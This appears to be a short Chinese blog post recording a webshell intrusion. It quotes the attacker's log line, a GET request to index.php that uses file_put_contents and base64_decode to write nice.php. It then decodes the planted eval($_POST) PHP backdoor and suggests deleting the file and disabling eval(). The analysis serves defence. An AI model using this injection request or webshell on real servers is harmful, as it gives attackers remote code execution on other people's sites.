系统相关
首页 > 系统相关> > 记录一次Webshell后门植入

记录一次Webshell后门植入

作者:互联网

后门语句:

[ 2021-07-21T02:56:30+08:00 ] 136.144.41.223 GET //index.php?m=--><?=file_put_contents('nice.php',base64_decode("

PD9waHAKY2xhc3MgeHsKICAgIHB1YmxpYyBmdW5jdGlvbiBpcCgpewogICAgICAgICRjPSAiICRfUE9TVFtuaWNlXSI7C

iAgICAgICAgcmV0dXJuICRjOwogICAgfQp9CiRjID0gbmV3IHgoKTsKJGIgPSAkYyAtPiBpcCgpOwpldmFsKCRiKTsKcHJp

bnQobWQ1KCJSaW5nbyIpKTsKPz4="));?>

解析:

#在指定文件下添加内容

file_put_contents()

#解码base64

base64_decode()

#要添加内容的文件

nice.php

#添加的内容

PD9waHAKY2xhc3MgeHsKICAgIHB1YmxpYyBmdW5jdGlvbiBpcCgpewogICAgICAgICRjPSAiICRfUE9TVFtuaWNlXSI7C

iAgICAgICAgcmV0dXJuICRjOwogICAgfQp9CiRjID0gbmV3IHgoKTsKJGIgPSAkYyAtPiBpcCgpOwpldmFsKCRiKTsKcHJp

bnQobWQ1KCJSaW5nbyIpKTsKPz4=

#解码后的添加内容

<?php
  class x{
    public function ip(){
      $c= " $_POST[nice]";
      return $c;
    }
  }
  $c = new x();
  $b = $c -> ip();
  eval($b);
  print(md5("Ringo"));
?>

大概意思就是在nice.php文件中添加上方代码  

处理方案:

扫出nice.php文件  替换或者删除 

屏蔽eval()函数

 

标签:Webshell,植入,文件,ip,添加,iAgICAgICAgcmV0dXJuICRjOwogICAgfQp9CiRjID0gbmV3IHgoKTsKJGIg
来源: https://www.cnblogs.com/caopeng/p/15069423.html